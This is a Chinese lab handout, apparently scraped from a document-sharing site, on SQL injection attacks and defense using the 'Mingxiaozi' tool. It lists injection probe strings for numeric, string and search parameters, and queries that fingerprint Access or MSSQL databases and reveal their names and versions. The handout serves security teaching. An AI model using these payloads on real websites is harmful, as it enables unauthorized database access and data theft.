课程编写类别内容实验课题名称HTTP攻击与防范-SQL注入攻击-03明小子工具实例实验目的与要求1、了解常用web 脚本2、了解常用web 脚本漏洞的利用点实验环境VPC1(虚拟PC)操作系统类型:windows,网络接口:本地连接VPC1 连接要求PC 网络接口,本地连接与实验网络直连软件描述1、学生机要求安装java环境2、vpc安装windows 2003实验环境描述1、学生机与实验室网络直连;2、VPC1与实验室网络直连;3、学生机与VPC1物理链路连通;预备知识1、类型:数字型:and 1=1 and 1=2 判断是否存在注入字符型: and 1=1 and 1=2搜索型:关键字% and 1=1 and %=% 关键字% and 1=2 and %=%2、IIS报错情况下使用:and user0 (判断是ACCESS还是MSSQL)不报错则使用各自数据库特性来判断and (select count(*) from msysobjects)0 (返回权限不足access数据库)and (select count(*) from sysobjects)0 (返回正常则为MSSQL数据库)and db_name()0 (返回数据库名)and 0(select @@version)-- (判断版本信息)and db_name()0 (返回数据库名)************注意
您可能关注的文档
- 学习:从桌面到iOS试编.pptx
- 高纯度蛋黄卵磷脂的制备及性能试编.pptx
- 高等高分子物理与化学作业-配合物高分子试编.pptx
- MATLAB_SIMULINK讲解完整版试编.ppt
- MatlabCh5图形绘制试编.ppt
- -闸板阀试编.pptx
- 高端大气体检型产说会流程灯片试编.pptx
- MATLAB的试编.ppt
- Matlab第五讲II:编程基础:函数试编.ppt
- 高三化学二轮复习:化学实验基础知识试编.pptx
- 2026黑龙江齐齐哈尔市龙沙区南航街道公益性岗位招聘1人备考题库及答案详解1套.docx
- 2026黑龙江齐齐哈尔市龙沙区南航街道公益性岗位招聘1人备考题库及答案详解参考.docx
- 2026黑龙江齐齐哈尔市龙沙区南航街道公益性岗位招聘1人备考题库及完整答案详解一套.docx
- 2026黑龙江齐齐哈尔市龙沙区南航街道公益性岗位招聘1人备考题库及答案详解(全优).docx
- 牡丹江市林口县2025-2026学年第二学期三年级语文期中考试卷(部编版含答案).docx
- 2026黑龙江齐齐哈尔市龙沙区南航街道公益性岗位招聘1人备考题库及完整答案详解1套.docx
- 通信行业 5G 网络切片安全防护技术创新项目技术创新总结报告.pptx
- 2026黑龙江齐齐哈尔市龙沙区南航街道公益性岗位招聘1人备考题库及完整答案详解.docx
- 2026黑龙江齐齐哈尔市龙沙区南航街道公益性岗位招聘1人备考题库及答案详解(全国通用).docx
- 厦门市湖里区2025-2026学年第二学期三年级语文第五单元测试卷(部编版含答案).docx
原创力文档

文档评论(0)